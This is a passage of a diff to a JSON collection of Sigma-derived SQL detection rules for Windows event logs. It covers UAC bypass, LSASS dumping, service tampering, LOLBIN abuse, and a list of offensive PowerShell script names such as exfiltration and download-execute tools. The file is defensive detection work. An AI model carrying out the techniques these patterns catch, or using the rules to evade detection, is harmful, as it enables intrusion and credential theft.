LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "PowerShell Decompress Commands", - "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "status": "test", - "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_decompress_commands.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", + "status": "test", + "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Nltest.EXE Execution", + "id": "903076ff-f442-475a-b667-4f246bcc203b", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Arun Chauhan", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1016", + "attack.t1018", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_nltest_execution.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "status": "test", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", "attack.execution", - "attack.t1059.001" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "status": "experimental", + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate use via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": "posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious Get Information for SMB Share - PowerShell Module", - "id": "6942bd25-5970-40ab-af49-944247103358", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Administrator script" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_smb_share_reco.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", - "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Use Get-NetTCPConnection - PowerShell Module", - "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious Computer Machine Password by PowerShell", - "id": "e3818659-5016-4811-a73c-dde4679169d2", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", - "author": "frack113", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ - "attack.initial_access", - "attack.t1078" + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" ], - "filename": "posh_pm_susp_reset_computermachinepassword.yml" + "filename": "proc_creation_win_lolbin_workflow_compiler.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "File Encoded To Base64 Via Certutil.EXE", + "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "status": "test", + "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE 